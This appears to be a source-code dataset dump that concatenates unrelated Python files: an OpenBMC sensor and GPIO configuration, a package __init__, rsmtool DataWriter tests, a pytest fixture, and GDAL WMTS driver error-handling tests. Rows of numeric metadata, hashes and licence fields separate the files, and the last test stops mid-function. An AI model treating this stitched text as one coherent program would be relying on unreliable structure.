        'PRODUCT_34': '<inventory_root>/system/chassis/motherboard/dimm22',
        'PRODUCT_35': '<inventory_root>/system/chassis/motherboard/dimm23',
        'PRODUCT_36': '<inventory_root>/system/chassis/motherboard/dimm24',
        'PRODUCT_37': '<inventory_root>/system/chassis/motherboard/dimm25',
        'PRODUCT_38': '<inventory_root>/system/chassis/motherboard/dimm26',
        'PRODUCT_39': '<inventory_root>/system/chassis/motherboard/dimm27',
        'PRODUCT_40': '<inventory_root>/system/chassis/motherboard/dimm28',
        'PRODUCT_41': '<inventory_root>/system/chassis/motherboard/dimm29',
        'PRODUCT_42': '<inventory_root>/system/chassis/motherboard/dimm30',
        'PRODUCT_43': '<inventory_root>/system/chassis/motherboard/dimm31',
        'PRODUCT_47': '<inventory_root>/system/misc',
    },
    'SENSOR': {
        # NOTE(review): key 0x02 is duplicated below (OperatingSystemStatus);
        # Python dict literals keep the LAST duplicate, so this entry is dead.
        0x02: '/org/openbmc/sensors/host/HostStatus',
        0x03: '/org/openbmc/sensors/host/BootProgress',
        # NOTE(review): key 0x5a is duplicated below (membuf4); this cpu0
        # entry is silently shadowed -- verify which mapping is intended.
        0x5a: '<inventory_root>/system/chassis/motherboard/cpu0',
        0xa4: '<inventory_root>/system/chassis/motherboard/cpu1',
        0x1e: '<inventory_root>/system/chassis/motherboard/dimm3',
        0x1f: '<inventory_root>/system/chassis/motherboard/dimm2',
        0x20: '<inventory_root>/system/chassis/motherboard/dimm1',
        0x21: '<inventory_root>/system/chassis/motherboard/dimm0',
        0x22: '<inventory_root>/system/chassis/motherboard/dimm7',
        0x23: '<inventory_root>/system/chassis/motherboard/dimm6',
        0x24: '<inventory_root>/system/chassis/motherboard/dimm5',
        0x25: '<inventory_root>/system/chassis/motherboard/dimm4',
        0x26: '<inventory_root>/system/chassis/motherboard/dimm11',
        0x27: '<inventory_root>/system/chassis/motherboard/dimm10',
        0x28: '<inventory_root>/system/chassis/motherboard/dimm9',
        0x29: '<inventory_root>/system/chassis/motherboard/dimm8',
        0x2a: '<inventory_root>/system/chassis/motherboard/dimm15',
        0x2b: '<inventory_root>/system/chassis/motherboard/dimm14',
        0x2c: '<inventory_root>/system/chassis/motherboard/dimm13',
        0x2d: '<inventory_root>/system/chassis/motherboard/dimm12',
        0x2e: '<inventory_root>/system/chassis/motherboard/dimm19',
        0x2f: '<inventory_root>/system/chassis/motherboard/dimm18',
        0x30: '<inventory_root>/system/chassis/motherboard/dimm17',
        0x31: '<inventory_root>/system/chassis/motherboard/dimm16',
        0x32: '<inventory_root>/system/chassis/motherboard/dimm23',
        0x33: '<inventory_root>/system/chassis/motherboard/dimm22',
        0x34: '<inventory_root>/system/chassis/motherboard/dimm21',
        0x35: '<inventory_root>/system/chassis/motherboard/dimm20',
        0x36: '<inventory_root>/system/chassis/motherboard/dimm27',
        0x37: '<inventory_root>/system/chassis/motherboard/dimm26',
        0x38: '<inventory_root>/system/chassis/motherboard/dimm25',
        0x39: '<inventory_root>/system/chassis/motherboard/dimm24',
        0x3a: '<inventory_root>/system/chassis/motherboard/dimm31',
        0x3b: '<inventory_root>/system/chassis/motherboard/dimm30',
        0x3c: '<inventory_root>/system/chassis/motherboard/dimm29',
        0x3d: '<inventory_root>/system/chassis/motherboard/dimm28',
        0x3e: '<inventory_root>/system/chassis/motherboard/cpu0/core0',
        0x3f: '<inventory_root>/system/chassis/motherboard/cpu0/core1',
        0x40: '<inventory_root>/system/chassis/motherboard/cpu0/core2',
        0x41: '<inventory_root>/system/chassis/motherboard/cpu0/core3',
        0x42: '<inventory_root>/system/chassis/motherboard/cpu0/core4',
        0x43: '<inventory_root>/system/chassis/motherboard/cpu0/core5',
        0x44: '<inventory_root>/system/chassis/motherboard/cpu0/core6',
        0x45: '<inventory_root>/system/chassis/motherboard/cpu0/core7',
        0x46: '<inventory_root>/system/chassis/motherboard/cpu0/core8',
        0x47: '<inventory_root>/system/chassis/motherboard/cpu0/core9',
        0x48: '<inventory_root>/system/chassis/motherboard/cpu0/core10',
        0x49: '<inventory_root>/system/chassis/motherboard/cpu0/core11',
        0x4a: '<inventory_root>/system/chassis/motherboard/cpu1/core0',
        0x4b: '<inventory_root>/system/chassis/motherboard/cpu1/core1',
        0x4c: '<inventory_root>/system/chassis/motherboard/cpu1/core2',
        0x4d: '<inventory_root>/system/chassis/motherboard/cpu1/core3',
        0x4e: '<inventory_root>/system/chassis/motherboard/cpu1/core4',
        0x4f: '<inventory_root>/system/chassis/motherboard/cpu1/core5',
        0x50: '<inventory_root>/system/chassis/motherboard/cpu1/core6',
        0x51: '<inventory_root>/system/chassis/motherboard/cpu1/core7',
        0x52: '<inventory_root>/system/chassis/motherboard/cpu1/core8',
        0x53: '<inventory_root>/system/chassis/motherboard/cpu1/core9',
        0x54: '<inventory_root>/system/chassis/motherboard/cpu1/core10',
        0x55: '<inventory_root>/system/chassis/motherboard/cpu1/core11',
        0x56: '<inventory_root>/system/chassis/motherboard/membuf0',
        0x57: '<inventory_root>/system/chassis/motherboard/membuf1',
        0x58: '<inventory_root>/system/chassis/motherboard/membuf2',
        0x59: '<inventory_root>/system/chassis/motherboard/membuf3',
        # NOTE(review): duplicate key 0x5a -- this entry wins over the cpu0
        # entry earlier in this dict.
        0x5a: '<inventory_root>/system/chassis/motherboard/membuf4',
        0x5b: '<inventory_root>/system/chassis/motherboard/membuf5',
        0x5c: '<inventory_root>/system/chassis/motherboard/membuf6',
        0x5d: '<inventory_root>/system/chassis/motherboard/membuf7',
        0x07: '/org/openbmc/sensors/host/BootCount',
        0x0c: '<inventory_root>/system/chassis/motherboard',
        0x01: '<inventory_root>/system/systemevent',
        0x08: '<inventory_root>/system/powerlimit',
        0x0d: '<inventory_root>/system/chassis/motherboard/refclock',
        0x0e: '<inventory_root>/system/chassis/motherboard/pcieclock',
        0x0f: '<inventory_root>/system/chassis/motherboard/todclock',
        0x10: '<inventory_root>/system/chassis/motherboard/apss',
        # NOTE(review): duplicate key 0x02 -- this entry wins over the
        # HostStatus entry at the top of this dict.
        0x02: '/org/openbmc/sensors/host/OperatingSystemStatus',
        0x04: '<inventory_root>/system/chassis/motherboard/pcielink',
        0x0b: '/xyz/openbmc_project/sensors/chassis/PowerSupplyRedundancy',
        0xda: '/org/openbmc/sensors/host/TurboAllowed',
        0xD8: '/org/openbmc/sensors/host/PowerSupplyDerating',
    },
    'GPIO_PRESENT': {}
}
# Per-signal GPIO assignments: logical signal name -> pin name and direction.
# Directions used here: 'out', 'in', 'falling', 'both' (the latter two are
# presumably edge-interrupt configurations -- confirm against the GPIO layer).
GPIO_CONFIG = {}
GPIO_CONFIG['BMC_POWER_UP'] = \
    {'gpio_pin': 'D1', 'direction': 'out'}
GPIO_CONFIG['SOFTWARE_PGOOD'] = \
    {'gpio_pin': 'R1', 'direction': 'out'}
GPIO_CONFIG['SYS_PWROK_BUFF'] = \
    {'gpio_pin': 'D2', 'direction': 'in'}

# Schematic net name: PV_CP_MD_JTAG_ATTENTION_N
GPIO_CONFIG['CHECKSTOP'] = \
    {'gpio_pin': 'J2', 'direction': 'falling'}
GPIO_CONFIG['BMC_CP0_RESET_N'] = \
    {'gpio_pin': 'A1', 'direction': 'out'}

# pcie switch reset
GPIO_CONFIG['BMC_VS1_PERST_N'] = \
    {'gpio_pin': 'B7', 'direction': 'out'}

# pcie slots reset - not connected?
GPIO_CONFIG['BMC_CP0_PERST_ENABLE_R'] = \
    {'gpio_pin': 'A3', 'direction': 'out'}

# Schematic net name: SOFT_FSI_DAT
GPIO_CONFIG['FSI_DATA'] = \
    {'gpio_pin': 'E0', 'direction': 'out'}

# Schematic net name: SOFT_FSI_CLK
GPIO_CONFIG['FSI_CLK'] = \
    {'gpio_pin': 'AA0', 'direction': 'out'}

# Schematic net name: BMC_FSI_IN_ENA
GPIO_CONFIG['FSI_ENABLE'] = \
    {'gpio_pin': 'D0', 'direction': 'out'}

# Schematic net name: FSI_JMFG0_PRSNT_N
GPIO_CONFIG['CRONUS_SEL'] = \
    {'gpio_pin': 'A6', 'direction': 'out'}

# Schematic net name: FP_PWR_BTN_N
GPIO_CONFIG['POWER_BUTTON'] = \
    {'gpio_pin': 'I3', 'direction': 'both'}

# Schematic net name: BMC_NMIBTN_IN_N
GPIO_CONFIG['RESET_BUTTON'] = \
    {'gpio_pin': 'J1', 'direction': 'both'}

# FIXME: needed for Witherspoon?
# Tracked by openbmc/openbmc#814
# Schematic net name: FP_ID_BTN_N
GPIO_CONFIG['IDBTN'] = \
    {'gpio_pin': 'Q7', 'direction': 'out'}
# TODO openbmc/openbmc#2288 - Determine if any pci resets needed
# Grouped GPIO roles; every signal name on the right refers to a key of
# GPIO_CONFIG above. The booleans in power_up_outs/reset_outs are the
# values to drive (True = assert) for that role.
GPIO_CONFIGS = {
    'power_config': {
        'power_good_in': 'SYS_PWROK_BUFF',
        'power_up_outs': [
            ('SOFTWARE_PGOOD', True),
            ('BMC_POWER_UP', True),
        ],
        'reset_outs': [
            ('BMC_CP0_RESET_N', False),
        ],
    },
    'hostctl_config': {
        'fsi_data': 'FSI_DATA',
        'fsi_clk': 'FSI_CLK',
        'fsi_enable': 'FSI_ENABLE',
        'cronus_sel': 'CRONUS_SEL',
        # No optional host-control GPIOs on this platform.
        'optionals': [
        ],
    },
}
# Miscellaneous non-poll sensor with system specific properties.
# The sensor id is the same as those defined in ID_LOOKUP['SENSOR'].
MISC_SENSORS = {
    0x07: {'class': 'BootCountSensor'},
    0x03: {'class': 'BootProgressSensor'},
    0x02: {'class': 'OperatingSystemStatusSensor'},
    # Garrison value is used, Not in P9 XML yet.
    0x0b: {'class': 'PowerSupplyRedundancySensor'},
    0xda: {'class': 'TurboAllowedSensor'},
    0xD8: {'class': 'PowerSupplyDeratingSensor'},
}

# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| 59.8
| 108
| 0.679538
| 2,618
| 23,023
| 5.751719
| 0.152024
| 0.208925
| 0.305353
| 0.402311
| 0.801434
| 0.792336
| 0.388963
| 0.309072
| 0.30522
| 0.30522
| 0
| 0.041128
| 0.140338
| 23,023
| 384
| 109
| 59.955729
| 0.719685
| 0.031273
| 0
| 0.008876
| 0
| 0
| 0.692895
| 0.560259
| 0
| 0
| 0.022981
| 0.002604
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a7f09a0fc4dda11502fea5e66b1c4ca36f07620
| 80
|
py
|
Python
|
vapour/__init__.py
|
speedcell4/vapour
|
c00b9b8fffddf0b134bec3ebb26d961e0468194a
|
[
"MIT"
] | null | null | null |
vapour/__init__.py
|
speedcell4/vapour
|
c00b9b8fffddf0b134bec3ebb26d961e0468194a
|
[
"MIT"
] | null | null | null |
vapour/__init__.py
|
speedcell4/vapour
|
c00b9b8fffddf0b134bec3ebb26d961e0468194a
|
[
"MIT"
] | null | null | null |
from vapour.links.connections import *
from vapour.links.architectures import *
| 26.666667
| 40
| 0.825
| 10
| 80
| 6.6
| 0.6
| 0.30303
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 80
| 2
| 41
| 40
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0a8dff536e92a510b1fc49f36612bb8d04624379
| 6,715
|
py
|
Python
|
tests/test_writer.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
tests/test_writer.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
tests/test_writer.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
import os
import numpy as np
import pandas as pd
from shutil import rmtree
from nose.tools import raises
from pandas.testing import assert_frame_equal
from rsmtool.container import DataContainer
from rsmtool.writer import DataWriter
class TestDataWriter:
def test_data_container_save_files(self):
data_sets = [{'name': 'dataset1', 'frame': pd.DataFrame(np.random.normal(size=(100, 2)),
columns=['A', 'B'])},
{'name': 'dataset2', 'frame': pd.DataFrame(np.random.normal(size=(120, 3)),
columns=['A', 'B', 'C'])}]
container = DataContainer(data_sets)
directory = 'temp_directory_data_container_save_files_xyz'
os.makedirs(directory, exist_ok=True)
writer = DataWriter()
for file_type in ['json', 'csv', 'xlsx']:
if file_type != 'json':
writer.write_experiment_output(directory,
container,
dataframe_names=['dataset1'],
file_format=file_type)
else:
writer.write_experiment_output(directory,
container,
new_names_dict={'dataset1': 'aaa'},
dataframe_names=['dataset1'],
file_format=file_type)
aaa_json = pd.read_json(os.path.join(directory, 'aaa.json'))
ds_1_csv = pd.read_csv(os.path.join(directory, 'dataset1.csv'))
ds_1_xls = pd.read_excel(os.path.join(directory, 'dataset1.xlsx'))
output_dir = os.listdir(directory)
rmtree(directory)
assert sorted(output_dir) == sorted(['aaa.json', 'dataset1.csv', 'dataset1.xlsx'])
assert_frame_equal(container.dataset1, aaa_json)
assert_frame_equal(container.dataset1, ds_1_csv)
assert_frame_equal(container.dataset1, ds_1_xls)
def test_dictionary_save_files(self):
data_sets = {'dataset1': pd.DataFrame(np.random.normal(size=(100, 2)),
columns=['A', 'B']),
'dataset2': pd.DataFrame(np.random.normal(size=(120, 3)),
columns=['A', 'B', 'C'])}
directory = 'temp_directory_dictionary_save_files_xyz'
os.makedirs(directory, exist_ok=True)
writer = DataWriter()
for file_type in ['json', 'csv', 'xlsx']:
if file_type != 'json':
writer.write_experiment_output(directory,
data_sets,
dataframe_names=['dataset1'],
file_format=file_type)
else:
writer.write_experiment_output(directory,
data_sets,
new_names_dict={'dataset1': 'aaa'},
dataframe_names=['dataset1'],
file_format=file_type)
aaa_json = pd.read_json(os.path.join(directory, 'aaa.json'))
ds_1_csv = pd.read_csv(os.path.join(directory, 'dataset1.csv'))
ds_1_xls = pd.read_excel(os.path.join(directory, 'dataset1.xlsx'))
output_dir = os.listdir(directory)
rmtree(directory)
assert sorted(output_dir) == sorted(['aaa.json', 'dataset1.csv', 'dataset1.xlsx'])
assert_frame_equal(data_sets['dataset1'], aaa_json)
assert_frame_equal(data_sets['dataset1'], ds_1_csv)
assert_frame_equal(data_sets['dataset1'], ds_1_xls)
@raises(KeyError)
def test_data_container_save_wrong_format(self):
    """Asking DataWriter for an unsupported file format must raise KeyError."""
    frames = [{'name': 'dataset1',
               'frame': pd.DataFrame(np.random.normal(size=(100, 2)),
                                     columns=['A', 'B'])},
              {'name': 'dataset2',
               'frame': pd.DataFrame(np.random.normal(size=(120, 3)),
                                     columns=['A', 'B', 'C'])}]
    container = DataContainer(frames)
    writer = DataWriter()
    # 'html' is not a supported format, so this call should fail before
    # anything is written (the directory is intentionally never created).
    writer.write_experiment_output('temp_directory_container_save_wrong_format_xyz',
                                   container,
                                   dataframe_names=['dataset1'],
                                   file_format='html')
def test_data_container_save_files_with_id(self):
    """A DataWriter constructed with an experiment id prefixes every file name.

    Output files must be ``test_<name>.<ext>`` and round-trip the frames.
    """
    frames = [{'name': 'dataset1',
               'frame': pd.DataFrame(np.random.normal(size=(100, 2)),
                                     columns=['A', 'B'])},
              {'name': 'dataset2',
               'frame': pd.DataFrame(np.random.normal(size=(120, 3)),
                                     columns=['A', 'B', 'C'])}]
    container = DataContainer(frames)
    directory = 'temp_directory_save_files_with_id_xyz'
    os.makedirs(directory, exist_ok=True)
    writer = DataWriter('test')
    for fmt in ('json', 'csv', 'xlsx'):
        if fmt == 'json':
            # json output additionally exercises renaming dataset1 -> aaa
            writer.write_experiment_output(directory,
                                           container,
                                           new_names_dict={'dataset1': 'aaa'},
                                           dataframe_names=['dataset1'],
                                           file_format=fmt)
        else:
            writer.write_experiment_output(directory,
                                           container,
                                           dataframe_names=['dataset1'],
                                           file_format=fmt)
    frame_from_json = pd.read_json(os.path.join(directory, 'test_aaa.json'))
    frame_from_csv = pd.read_csv(os.path.join(directory, 'test_dataset1.csv'))
    frame_from_xlsx = pd.read_excel(os.path.join(directory, 'test_dataset1.xlsx'))
    written_files = os.listdir(directory)
    rmtree(directory)
    assert sorted(written_files) == sorted(['test_aaa.json',
                                            'test_dataset1.csv',
                                            'test_dataset1.xlsx'])
    assert_frame_equal(container.dataset1, frame_from_json)
    assert_frame_equal(container.dataset1, frame_from_csv)
    assert_frame_equal(container.dataset1, frame_from_xlsx)
| 44.177632
| 96
| 0.495309
| 640
| 6,715
| 4.926563
| 0.134375
| 0.030447
| 0.050745
| 0.054234
| 0.865525
| 0.849984
| 0.821757
| 0.815731
| 0.79353
| 0.777989
| 0
| 0.020504
| 0.397171
| 6,715
| 151
| 97
| 44.470199
| 0.758399
| 0
| 0
| 0.707965
| 0
| 0
| 0.104095
| 0.02487
| 0
| 0
| 0
| 0
| 0.115044
| 1
| 0.035398
| false
| 0
| 0.070796
| 0
| 0.115044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ac26326d94bb2c3a7550896ae73255d0c891b90
| 131
|
py
|
Python
|
tests/conftest.py
|
luc4sdreyer/gan
|
c8d5c18d8d6bff6d4f6b694d9898ffc33499398c
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
luc4sdreyer/gan
|
c8d5c18d8d6bff6d4f6b694d9898ffc33499398c
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
luc4sdreyer/gan
|
c8d5c18d8d6bff6d4f6b694d9898ffc33499398c
|
[
"MIT"
] | null | null | null |
import random
import pytest
import numpy as np
@pytest.fixture
def reset_random_seed():
    """Pytest fixture: reseed both RNGs to 0 so dependent tests are reproducible."""
    # Seed the stdlib and NumPy generators; any test requesting this fixture
    # starts from the same deterministic random state.
    random.seed(0)
    np.random.seed(0)
| 13.1
| 24
| 0.732824
| 21
| 131
| 4.47619
| 0.52381
| 0.319149
| 0.234043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018519
| 0.175573
| 131
| 9
| 25
| 14.555556
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0.428571
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0aca04c941d5e88013969b24846b8c7b0d3e8862
| 63,880
|
py
|
Python
|
autotest/gdrivers/wmts.py
|
roman0yurin/gdal
|
349a0992c7ebd0c71e8014e00897b098e4ca16fb
|
[
"MIT"
] | 1
|
2017-08-23T13:32:41.000Z
|
2017-08-23T13:32:41.000Z
|
autotest/gdrivers/wmts.py
|
norBIT/gdal
|
64855dbee2cd0dff47da11d916c8d2703b4e99b8
|
[
"MIT"
] | 7
|
2018-04-09T09:35:42.000Z
|
2018-05-22T06:54:05.000Z
|
autotest/gdrivers/wmts.py
|
norBIT/gdal
|
64855dbee2cd0dff47da11d916c8d2703b4e99b8
|
[
"MIT"
] | 2
|
2018-05-03T15:34:36.000Z
|
2020-07-13T15:30:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: WMTS driver test suite.
# Author: Even Rouault, even dot rouault at spatialys.com
#
###############################################################################
# Copyright (c) 2015, Even Rouault <even dot rouault at spatialys.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
import shutil
sys.path.append( '../pymod' )
from osgeo import gdal
import gdaltest
###############################################################################
# Find WMTS driver
def wmts_1():
    """Locate the WMTS driver; mark the whole suite as skipped when unavailable."""
    gdaltest.wmts_drv = gdal.GetDriverByName('WMTS')
    # WMTS is implemented on top of WMS; without WMS the driver is unusable.
    if gdaltest.wmts_drv is not None and gdal.GetDriverByName('WMS') is None:
        print('Missing WMS driver')
        gdaltest.wmts_drv = None
    if gdaltest.wmts_drv is None:
        return 'skip'
    # Allow HTTP fetches against /vsimem and keep the tile cache in memory.
    gdal.SetConfigOption('CPL_CURL_ENABLE_VSIMEM', 'YES')
    gdal.SetConfigOption('GDAL_DEFAULT_WMS_CACHE_PATH', '/vsimem/cache')
    return 'success'
###############################################################################
# Error: no URL and invalid GDAL_WMTS service file documents
def wmts_2():
    """Error cases: empty WMTS connection string and invalid GDAL_WMTS documents.

    Each connection string below must be rejected (gdal.Open returns None).
    The original code repeated the same open/check stanza four times; it is
    collapsed into one data-driven loop with the offending input printed on
    failure, matching the diagnostic style of the other tests in this file.
    """
    if gdaltest.wmts_drv is None:
        return 'skip'
    for conn in ['WMTS:',                      # no URL at all
                 '<GDAL_WMTS>',                # unterminated XML
                 '<GDAL_WMTSxxx/>',            # wrong root element
                 '<GDAL_WMTS></GDAL_WMTS>']:   # missing GetCapabilitiesUrl
        # Silence the expected error output while attempting the open.
        gdal.PushErrorHandler()
        ds = gdal.Open(conn)
        gdal.PopErrorHandler()
        if ds is not None:
            gdaltest.post_reason('fail')
            print(conn)
            return 'fail'
    return 'success'
###############################################################################
# Error: invalid URL
def wmts_3():
    """Error: opening a non-existing http URL must fail."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    # Errors are expected here; suppress them while opening.
    gdal.PushErrorHandler()
    dataset = gdal.Open('WMTS:https://non_existing')
    gdal.PopErrorHandler()
    if dataset is None:
        return 'success'
    gdaltest.post_reason('fail')
    return 'fail'
###############################################################################
# Error: invalid URL
def wmts_4():
    """Error: opening a non-existing /vsimem path must fail."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    # Errors are expected here; suppress them while opening.
    gdal.PushErrorHandler()
    dataset = gdal.Open('WMTS:/vsimem/non_existing')
    gdal.PopErrorHandler()
    if dataset is None:
        return 'success'
    gdaltest.post_reason('fail')
    return 'fail'
###############################################################################
# Error: invalid XML in GetCapabilities response
def wmts_5():
    """Error: GetCapabilities response that is not well-formed XML."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    # Serve a deliberately broken document from the in-memory filesystem.
    gdal.FileFromMemBuffer('/vsimem/invalid_getcapabilities.xml', '<invalid_xml')
    gdal.PushErrorHandler()
    dataset = gdal.Open('WMTS:/vsimem/invalid_getcapabilities.xml')
    gdal.PopErrorHandler()
    if dataset is None:
        return 'success'
    gdaltest.post_reason('fail')
    return 'fail'
###############################################################################
# Error: invalid content in GetCapabilities response
def wmts_6():
    """Error: well-formed XML but not a usable capabilities document."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    # Valid XML, but an empty <Capabilities/> carries no layer information.
    gdal.FileFromMemBuffer('/vsimem/invalid_getcapabilities.xml', '<Capabilities/>')
    gdal.PushErrorHandler()
    dataset = gdal.Open('WMTS:/vsimem/invalid_getcapabilities.xml')
    gdal.PopErrorHandler()
    if dataset is None:
        return 'success'
    gdaltest.post_reason('fail')
    return 'fail'
###############################################################################
# Error: no layers
def wmts_7():
    """Error: capabilities document whose <Contents> declares no layer."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/empty_getcapabilities.xml', '<Capabilities><Contents/></Capabilities>')
    gdal.PushErrorHandler()
    dataset = gdal.Open('WMTS:/vsimem/empty_getcapabilities.xml')
    gdal.PopErrorHandler()
    if dataset is None:
        return 'success'
    gdaltest.post_reason('fail')
    return 'fail'
###############################################################################
# Error: missing TileMatrixSetLink and Style
def wmts_8():
    """Error: layer missing both TileMatrixSetLink and Style elements."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    # A layer with only an identifier is incomplete and must be rejected.
    gdal.FileFromMemBuffer('/vsimem/missing.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
</Layer>
</Contents>
</Capabilities>""")
    gdal.PushErrorHandler()
    dataset = gdal.Open('WMTS:/vsimem/missing.xml')
    gdal.PopErrorHandler()
    if dataset is None:
        return 'success'
    gdaltest.post_reason('fail')
    return 'fail'
###############################################################################
# Error: missing TileMatrixSet
def wmts_9():
    """Error: layer links to a TileMatrixSet that the document never defines."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/missing_tms.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.jpeg" resourceType="tile"/>
</Layer>
</Contents>
</Capabilities>""")
    # Open must fail; silence the expected error output.
    gdal.PushErrorHandler()
    ds = gdal.Open('WMTS:/vsimem/missing_tms.xml')
    gdal.PopErrorHandler()
    if ds is not None:
        gdaltest.post_reason('fail')
        return 'fail'
    return 'success'
###############################################################################
# Error: Missing SupportedCRS
def wmts_10():
    """Error: TileMatrixSet lacks the mandatory SupportedCRS element."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/missing_SupportedCRS.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.jpeg" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier/>
</TileMatrixSet>
</Contents>
</Capabilities>""")
    # Open must fail; silence the expected error output.
    gdal.PushErrorHandler()
    ds = gdal.Open('WMTS:/vsimem/missing_SupportedCRS.xml')
    gdal.PopErrorHandler()
    if ds is not None:
        gdaltest.post_reason('fail')
        return 'fail'
    return 'success'
###############################################################################
# Error: Cannot find TileMatrix in TileMatrixSet
def wmts_11():
    """Error: TileMatrixSet has a CRS but contains no TileMatrix element."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/no_tilematrix.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.jpeg" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier/>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
</TileMatrixSet>
</Contents>
</Capabilities>""")
    # Open must fail; silence the expected error output.
    gdal.PushErrorHandler()
    ds = gdal.Open('WMTS:/vsimem/no_tilematrix.xml')
    gdal.PopErrorHandler()
    if ds is not None:
        gdaltest.post_reason('fail')
        return 'fail'
    return 'success'
###############################################################################
# Error: Missing required element in TileMatrix element
def wmts_12():
    """Error: TileMatrix present but empty (missing its required children)."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/missing_required_element_in_tilematrix.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.jpeg" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier/>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix/>
</TileMatrixSet>
</Contents>
</Capabilities>""")
    # Open must fail; silence the expected error output.
    gdal.PushErrorHandler()
    ds = gdal.Open('WMTS:/vsimem/missing_required_element_in_tilematrix.xml')
